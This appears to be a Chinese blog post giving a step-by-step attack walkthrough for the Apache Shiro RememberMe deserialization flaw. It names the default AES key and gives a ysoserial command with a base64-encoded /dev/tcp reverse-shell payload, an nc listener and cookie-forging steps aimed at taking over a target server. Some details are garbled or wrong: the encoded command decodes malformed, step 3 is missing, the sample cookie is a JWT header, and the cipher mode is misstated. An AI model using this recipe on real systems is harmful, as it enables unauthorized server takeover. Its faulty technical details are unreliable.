shiro攻防利用

一. 工具准备

  • 核心工具:ShiroExploit(最常用,自动检测密钥、生成Payload)、ysoserial(生成恶意序列化对象);

  • 辅助工具:Burp Suite(抓取Cookie、修改Cookie发送请求)、nc(监听反弹Shell)、Base64编码工具;

  • 前提条件:目标使用受影响的Shiro版本(≤1.2.4)或未修改默认密钥;目标开启RememberMe功能;目标可出网(反弹Shell场景);目标项目依赖CommonsCollections等可利用组件。

二. 完整利用步骤

步骤1:检测目标是否存在Shiro漏洞(密钥探测)

方法1:使用ShiroExploit工具自动探测

bash 复制代码
# 运行ShiroExploit工具(Java版) java -jar ShiroExploit-2.5.jar -u http://目标IP:端口 # 自动探测目标是否存在Shiro漏洞,检测默认密钥

方法2:手动探测(Burp Suite)

  1. 访问目标登录页面,勾选「记住我」,输入正确账号密码登录,抓取返回的RememberMe Cookie;

  2. 将Cookie值Base64解码,若解码后能看到明显的序列化特征(如aced0005开头),说明目标开启Shiro RememberMe功能;

  3. 使用已知默认密钥,对任意内容加密、Base64编码,替换RememberMe Cookie,若返回500错误或异常日志,说明密钥正确,存在漏洞。

步骤2:生成恶意序列化Payload(ysoserial)

使用ysoserial生成包含反弹Shell命令的恶意序列化对象,命令如下:

bash 复制代码
# 生成CommonsCollections3类型的恶意序列化对象,反弹Shell(替换为你的恶意IP和监听端口) java -jar ysoserial.jar CommonsCollections3 "bash -c {echo,YmFzaCAtYyAnY2hpbGRyZW4gMTI3LjAuMC4xIDIwMDAwIC1pICY+L2Rldi90Y3AvMTI3LjAuMC4xLzIwMDAwICYm} | {base64,-d} | {bash,-i}" > payload.ser

说明:CommonsCollections3是最常用的利用链,需目标项目依赖该组件;若目标无此依赖,可尝试CommonsCollections4、JRMP等其他利用链。

使用已知的Shiro密钥(如默认密钥kPH+bIxk5D2deZiIxcaaaA==),对恶意序列化对象进行AES加密、Base64编码,生成伪造的RememberMe Cookie:

  • 工具生成:ShiroExploit工具可直接输入密钥、反弹命令,自动生成伪造Cookie,无需手动加密;

  • 手动加密(简化):AES加密(ECB模式、PKCS5Padding填充)→ Base64编码,最终得到的字符串即为RememberMe Cookie值。

步骤4:监听反弹Shell,发送恶意请求

在恶意服务器上,用nc监听指定端口(与反弹Shell命令一致):

bash 复制代码
nc -lvp 20000 # 监听20000端口,接收反弹Shell

用Burp Suite抓取目标任意请求(如访问首页),修改请求头中的RememberMe Cookie为伪造的值:

bash 复制代码
Cookie: rememberMe=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...(伪造的Cookie值)

发送请求,服务端会解密、反序列化伪造的Cookie,触发恶意代码执行,nc端即可收到反弹的Shell,获得目标服务器控制权。

三. 常见利用问题

  • 问题1:密钥正确,但无法反弹Shell → 解决:更换ysoserial利用链(如CommonsCollections4),检查目标是否依赖对应组件,检查目标服务器是否可出网;

  • 问题2:返回500错误,但无Shell → 解决:检查恶意命令是否正确,是否适配目标服务器系统(Windows用calc.exe测试,Linux用bash命令);

  • 问题3:工具检测不到漏洞 → 解决:手动探测密钥,检查目标是否开启RememberMe功能,是否修改了默认密钥。

相关推荐
小楼v1 小时前
AI应用对话生成的安全性优化
java·后端·ai·护轨
小程故事多_802 小时前
破局 LLM 黑盒困局,Phoenix 凭全链路可观测,重构大模型应用工程化落地规则
java·前端·人工智能·重构·aigc
追随者永远是胜利者9 小时前
(LeetCode-Hot100)253. 会议室 II
java·算法·leetcode·go
追随者永远是胜利者10 小时前
(LeetCode-Hot100)207. 课程表
java·算法·leetcode·go
枷锁—sha11 小时前
【pwn系列】Pwndbg 汇编调试实操教程
网络·汇编·笔记·安全·网络安全
Bruce_Liuxiaowei11 小时前
Windows系统安全加固——从基础到进阶的实战配置
windows·安全·系统安全
yanghuashuiyue12 小时前
lambda+sealed+record
java·开发语言
盟接之桥12 小时前
盟接之桥EDI软件:API数据采集模块深度解析,打造企业数据协同新引擎
java·运维·服务器·网络·数据库·人工智能·制造
A1b2rt12 小时前
CISCN-2025-FINAL-DarkHeap
安全·pwn·wp·ciscn